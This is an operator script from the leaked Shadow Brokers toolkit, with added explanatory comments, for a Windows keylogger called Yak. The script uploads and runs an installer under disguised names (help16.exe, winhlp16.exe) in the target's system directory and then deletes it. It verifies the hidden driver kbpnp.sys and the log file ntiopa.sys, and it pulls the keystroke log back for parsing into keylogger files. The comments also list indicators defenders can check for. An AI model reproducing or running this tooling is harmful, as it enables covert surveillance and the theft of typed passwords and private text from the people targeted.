shadowbrokers-exploits/windows/Resources/Ep/Scripts/Yak.eps


#--------------------------------------------------------
# File: Yak.eps
#
# Script to install/uninstall/collect Yak
#--------------------------------------------------------
@include "_FileExists.epm";
@include "_GenericFunctions.epm";
@echo off;
@case-sensitive off;
#--------------------------------------------------------
# Get path that EP scripts are run out of
#--------------------------------------------------------
# Top-level driver. Resolves operator-side tool paths relative to the
# scripts directory, resolves the target's system path, then either
# dispatches on $argv[1] (INSTALL|UNINSTALL|VERIFY|COLLECT|?) or falls
# into the interactive menu loop further down.
string $ScriptsDir;
_GetEPScriptsPath($ScriptsDir);
int $menuOption;
# Operator-side locations only; nothing in this section touches the target.
string $localPath = "$ScriptsDir\\..\\..\\..\\tools\\yak";
string $yakUploadFile = "yak_min_install.exe";
string $localInstallPath = "$localPath\\$yakUploadFile";
# Local parser binary that YakCollect runs over the retrieved log.
string $localParsePath = "$localPath\\yak.exe";
# Name the uploaded installer takes on the target (fallback chosen below).
string $fileName = "help16.exe";
#--------------------------------------------------------
# Get system path
#--------------------------------------------------------
# Bail out of the whole script if the target's system path cannot be resolved.
string $systemPath;
ifnot (_GetSystemPath($systemPath)) {
return false;
}
#--------------------------------------------------------
# Check to see if help16.exe exists on the target (shouldn't)
#--------------------------------------------------------
# If help16.exe is already present, switch to winhlp16.exe so the upload
# does not overwrite an existing file. Either name, appearing briefly in
# the system path, is the on-target artifact of an install/uninstall run
# (YakInstall deletes it after running it), so file-creation telemetry is
# where a defender would see it.
if (_FileExists ($fileName, "$systemPath")) {
$fileName = "winhlp16.exe";
}
echo "";
# Non-interactive mode: perform one task named on the command line.
# $YakUploadFile below differs in case from $yakUploadFile above; the two
# resolve to the same variable only because of the "@case-sensitive off"
# directive at the top of the file.
if($argc > 1){
if($argv[1] == "INSTALL"){
return YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-is");
}
else if ($argv[1] == "UNINSTALL"){
return YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-u");
}
else if ($argv[1] == "VERIFY"){
return YakVerify($systemPath);
}
else if ($argv[1] == "COLLECT"){
# Only the failure path returns here; a successful COLLECT falls
# through into the interactive menu loop below instead of returning.
ifnot(YakCollect($systemPath, $localParsePath)){
echo "Collection and parsing could not be completed, please finish manually";
return false;
}
}
else{
# "?" prints usage without the "not a valid argument" complaint;
# any other unknown argument prints both. Both return false.
ifnot( $argv[1] == "?"){
echo "$argv[1] is not a valid argument";
}
YakUsage();
return false;
}
}
# Interactive mode: loop until the operator picks 0 (Exit). Every other
# option runs its task and then pauses before redrawing the menu.
while (true) {
echo "- Yak";
# print the command list
echo "";
echo " (0). Exit";
echo " (1). Install";
echo " (2). Uninstall";
echo " (3). Verify Install/Uninstall";
echo " (4). Collect and Parse";
echo "";
$menuOption = GetInput("Enter the desired option");
if ($menuOption == 0) {
#--------------------------------------------------------
# Quit
#--------------------------------------------------------
return true;
} else if ($menuOption == 1) {
YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-is");
} else if ($menuOption == 2) {
YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-u");
} else if ($menuOption == 3) {
YakVerify($systemPath);
} else if ($menuOption == 4) {
ifnot(YakCollect($systemPath, $localParsePath)){
echo "Collection and parsing could not be completed, please finish manually";
}
} else {
#--------------------------------------------------------
# Invalid menuOption
#--------------------------------------------------------
echo "*** Invalid menuOption ***";
}
pause;
}
# Unreachable: the loop above only exits via "return true".
return false;
Sub YakUsage()
{
# Prints the command-line usage text. Always returns true; the caller
# decides the script's own return value.
echo "Usage: yak [arg]";
echo " Runs Yak Script to perform Yak install, uninstall, verification, or collect";
echo "";
echo "Arguments:";
echo " [arg]";
echo " (optional) performs a specific Yak task and returns. ";
echo " (INSTALL|UNINSTALL|VERIFY|COLLECT)";
echo "";
return true;
}
Sub YakInstall(IN string $localInstallPath, IN string $YakUploadFile, IN string $systemPath, IN string $fileName, IN string $command)
{
# Uploads $localInstallPath to "$systemPath\$fileName", runs it on the
# target with $command, then deletes the uploaded file again.
#
# Parameters:
#   $localInstallPath - operator-side path of the installer binary
#   $YakUploadFile    - installer file name; used only in the status message
#   $systemPath       - target directory the file is dropped into
#   $fileName         - name the file takes on the target
#   $command          - switch passed to the uploaded binary ("-is" or "-u")
#
# Returns true only if both the put and the run succeeded. A failed
# delete is reported to the operator but does not change the result,
# so "$systemPath\$fileName" may be left behind on the target.
echo "!!! THIS IS THE OLD VERSION OF YAK, YOU PROBABLY SHOULDN'T INSTALL IT!!!";
# Guard for the install switch: both branches of the prompt return false,
# so for "-is" the upload/run below is never reached. Only the "-u"
# (uninstall) path proceeds past this point.
if ($command == "-is") {
ifnot (prompt "Are you sure you want to proceed?") {
return false;
} else {
echo "You didn't just actually try to do this, did you?";
return false;
}
}
bool $success = true;
#--------------------------------------------------------
# Install Yak - upload and run with -is option
#--------------------------------------------------------
echo "Uploading $YakUploadFile to $systemPath\\$fileName";
ifnot(`put $localInstallPath -name "$systemPath\\$fileName"`){
echo "Could not put $fileName into $systemPath";
$success = false;
}else{
echo "";
echo "Running $fileName on target...\n";
# Command echo is switched on around the run so the exact command line
# appears in the session output; the failure branch switches it off
# again before reporting. What "-redirect" does is not shown in this file.
@echo on;
ifnot(`run -command "$systemPath\\$fileName $command" -redirect`)
{
@echo off;
echo "Could not run $systemPath\\$fileName $command";
$success = false;
}
}
@echo off;
echo "";
# Cleanup is attempted regardless of whether the put or run succeeded.
echo "Deleting $systemPath\\$fileName";
ifnot(`del $fileName -path $systemPath`){
echo "Could not delete $systemPath\\$fileName";
echo "Please delete it manually";
}
return $success;
}
Sub YakVerify(IN string $systemPath)
{
# Reports the install state by checking for the two on-target artifacts:
#   "$systemPath\ntiopa.sys"         - the log file
#   "$systemPath\drivers\kbpnp.sys"  - the driver
# Returns true only when both exist. These two paths are the file-system
# indicators a defender would check for this keylogger.
#
# Parameters:
#   $systemPath - target system directory that the artifacts live under
#--------------------------------------------------------
# Check to see if yak files exist
#--------------------------------------------------------
bool $logSuccessFlag = true;
bool $driverSuccessFlag = true;
bool $success = true;
if (_FileExists ("ntiopa.sys", "$systemPath")) {
echo "ntiopa.sys log file exists ... SUCCESSFUL";
} else {
echo "ntiopa.sys log file missing ... FAILED";
$logSuccessFlag = false;
# Note: this blank line is only printed on the "missing" branch.
echo ""; }
if (_FileExists ("kbpnp.sys", "$systemPath\\drivers")) {
echo "kbpnp.sys driver exists ... SUCCESSFUL";
} else {
echo "kbpnp.sys driver missing ... FAILED";
$driverSuccessFlag = false;
}
echo "";
# Both present -> installed; exactly one present -> half-applied state
# (the script reports a reboot is needed); neither -> not installed.
if (($logSuccessFlag == true) && ($driverSuccessFlag == true)) {
echo "YAK properlly installed on target";
} else if ((($logSuccessFlag == true) && ($driverSuccessFlag == false)) ||
(($logSuccessFlag == false) && ($driverSuccessFlag == true))) {
echo "YAK is in a bad state...need a reboot before it's functional";
$success = false;
} else {
echo "YAK doesn't exist on target!";
$success = false;
}
return $success;
}
Sub YakCollect(IN string $systemPath, IN string $localParsePath)
{
# Retrieves "$systemPath\ntiopa.sys" from the target, moves the local
# copy into Get_Files\NOSEND, and runs the local parser twice over it to
# write keylogger$fileDate.txt and keylogger_scancodes$fileDate.txt into
# that directory.
#
# Parameters:
#   $systemPath     - target directory that holds ntiopa.sys
#   $localParsePath - operator-side path of the yak.exe parser
#
# Returns false immediately if the retrieval or the local move fails.
# A parser failure is reported and makes the result false, but the
# second parser run is still attempted.
bool $success = true;
#--------------------------------------------------------
# Download Yak and Parse the local file
#--------------------------------------------------------
echo "Getting $systemPath\\ntiopa.sys...";
echo "";
# @record appears to capture the copyget command's output so that
# GetCmdData("LocalName") can read the local file name it reported;
# the semantics of @record/GetCmdData are not shown in this file.
@record on;
ifnot(`copyget "$systemPath\\ntiopa.sys"`){
echo "Could not copyget $systemPath\\ntiopa.sys";
@record off;
return false;
}
@record off;
string $localName = GetCmdData("LocalName");
# Build a suffix from the local file name: split on "_" and re-join every
# element after the first with "_". $temp is declared as a string but is
# indexed like a list; how the EP runtime stores split's result is not
# shown here. If the name contains no "_", $fileDate stays "" and the
# outputs are named keylogger.txt / keylogger_scancodes.txt.
string $temp = split("_", $localName);
int $counter = 1;
string $fileDate = "";
while ($counter < sizeOf($temp)) {
# "\_" presumably keeps the "_" from being read as part of the
# variable name "$fileDate" — TODO confirm against the EP string rules.
$fileDate = "$fileDate\_$temp[$counter]";
$counter++;
}
echo "";
echo "Moving file to NOSEND directory...";
# mkdir result is not checked; the move below fails if it did not exist.
`local mkdir Get_Files\\NOSEND`;
ifnot(`local move Get_Files\\$localName Get_Files\\NOSEND\\$localName`){
echo "Could not move Get_Files\\$localName into Get_Files\\NOSEND\\$localName";
return false;
}
echo "";
echo "Parsing file...";
# Two parser passes over the same input with different switches
# ("-tu" and "-tau"); what each switch selects is not shown in this file.
ifnot(`local run -command "$localParsePath -tu -i Get_Files\\NOSEND\\$localName -o Get_Files\\NOSEND\\keylogger$fileDate.txt"`){
echo "Could not run $localParsePath -tu -i";
$success = false;
}
ifnot(`local run -command "$localParsePath -tau -i Get_Files\\NOSEND\\$localName -o Get_Files\\NOSEND\\keylogger_scancodes$fileDate.txt"`){
echo "Could not run $localParsePath -tau -i";
$success = false;
}
# Wait (unit of 3000 not stated here; presumably milliseconds) and then
# list the produced files with command echo on so the listing is visible.
sleep 3000;
@echo on;
`local dir *$fileDate* -path "Get_Files\\NOSEND"`;
@echo off;
return $success;
}